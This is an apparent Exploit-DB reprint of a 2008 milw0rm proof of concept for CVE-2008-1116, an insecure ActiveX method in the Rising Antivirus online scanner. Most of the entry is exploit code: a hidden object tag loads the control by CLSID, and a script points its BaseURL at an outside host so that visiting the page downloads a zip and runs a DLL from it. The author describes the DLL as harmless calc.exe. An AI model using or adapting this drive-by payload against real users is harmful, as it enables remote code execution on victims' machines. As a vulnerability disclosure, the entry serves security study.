Rising Antivirus Online Scanner Insecure Method Flaw Exploit

ID EDB-ID:5188
Type exploitdb
Reporter John Smith
Modified 2008-02-25T00:00:00


Rising Antivirus Online Scanner Insecure Method Flaw Exploit. CVE-2008-1116. Remote exploit for windows platform

- Rising is a popular anti-virus product around China.
- there's an insecure method flaw inside its free online scanner.
- it's quite easy to exploit the bug which leads to a remote execution.
- visit http://online.rising.com.cn/free/index.htm to install the ActiveX first.
- the demonstration below will download http://jsmith080220.googlepages.com/olupdate.zip and
  launch olupdate.dll inside the package.
- you can code olupdate.dll yourself, in this case, I played with harmless calc.exe
<head><title>Rising Online Scanner Insecure Method Vulnerability</title></head>
<object style="display:none" classid="clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153" height="265" id="rav" width="430" VIEWASTEXT>
<param NAME="BackColor" VALUE="#ECECEC">
<param NAME="ForeColor" VALUE="#000000">
function test()
rav.BaseURL = "http://jsmith080220.googlepages.com/";
rav.Encardid = "0000$0000$0000";
<input type="button" value=" Go " onclick="test()"><br><br>
wait for a few seconds after clicking the button

# milw0rm.com [2008-02-25]